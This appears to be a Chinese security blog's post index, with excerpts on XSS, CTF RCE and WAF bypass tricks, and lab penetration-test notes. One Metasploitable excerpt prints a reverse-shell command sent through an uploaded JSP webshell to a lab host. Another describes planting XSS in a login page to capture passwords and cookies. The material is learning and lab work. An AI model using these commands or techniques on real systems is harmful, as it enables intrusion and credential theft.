xss xmindhttps://www.zhixi.com/view/f03dc04b 图片 大纲:XSS形成原因服务器没有对用户的输入做良好的过滤,以至于执行黑客的js 代码挖掘方法留意能将我们的输入展示出来的地方分类反射型xss这个多用于钓鱼存储型xss这种多用于博客,论坛,留言板当中,在发帖的过程中嵌入XSS攻击代码,帖子被目标服务器存储在数据库当中,当用户进行正常的额访问时,触发XSS代 2024-05-02 #整理
web权限维持 使用xss 既然已经获取了web 权限,可以尝试在某一个登录页面插入xss 代码 例如 登录就会访问?user&password? 这样的url 那么只要登陆就会将其 密码获取(表单截取),还有一种cookie截取 2024-04-29 #渗透
Metasploitable1 信息收集 端口信息收集 漏洞8180-tomcat 弱密码 上传war 包 1http://192.168.79.186:8180/cmd/cmd.jsp?cmd=/bin/sh -i >& /dev/tcp/192.168.79.137/19999 0>&1 发现不行,尝试使用nc 进行反弹shell 1http://192.168.79.18 2024-04-28 #靶场记录
无字母rce 异或^异或的规则是将两个数拿来异或的话,相同的话就为0,不相同就为1 在php中两个字符相异或之后还是字符,所以我们可以选择两个不是字母的字符进行异或从而得到我们需要的 使用 [HUBUCTF 2022 新生赛]HowToGetShell 举例 首先查看源码 1234567<?phpshow_source(__FILE__);$mess=$_POST['mess'];if 2024-04-27 #CTF
rce总结 替代cat rev nl less tac highlight_file() show_source() include ls 替代 exa flag绕过 f??? f”lag f/lag f”lag ./显示当前的flag 2024-04-26 #CTF
waf绕过思路总结 引言首先有一个问题,什么是waf waf 的全称是:Web Application Firewall 可以这个是web 应用的防火墙,但是和传统的防火墙有什么区别呢? 放置位置 IDS: 入侵检测系统 IPS: 入侵防御系统 WAF: Web应用程序防火墙 osi 模型中的位置 传统防火墙工作在传输层和网络层(3,4)层 waf 工作于应用层,同时能够向下兼容网络防火墙 工作 2024-04-26 #渗透
php比较 [SWPUCTF 2022 新生赛]funny_web0x00 使用的知识点是php 的弱比较 0x01 发现是弱比较的话,可以参考 PHP强相等&弱相等(附带科学计数法)_强等于 弱等于-CSDN博客 可以使用科学计数法 就可以解出 2024-04-07 #CTF刷题记录
项目8 信息收集 使用nmap 判断找到ip 得到ip 192.168.79.179 端口信息收集 web 打点21尝试爆破ftp 没有结果 22爆破,没有结果 80cms 尝试web 路径爆破 并没有什么作用 根据提示绑定域名 C:\WINDOWS\system32\drivers\etc 打开hosts 添加这个 出现了一个神奇玩意儿 尝试爆破一下路径 尝试观看日志 发 2024-04-05 #靶场记录
bugku渗透测试一 场景一直接通过源码 搜索 场景二根据提示,我直接拼接了admin 成功跳转 弱口令进入 随便看看 场景三观察,发现并没有暴露的数据库信息 那就只有尝试连接主机看看,刚才看到执行代码的地方,试试 直接连接 然后找找 场景四 注意不能使用localhost 2024-04-04 #CTF刷题记录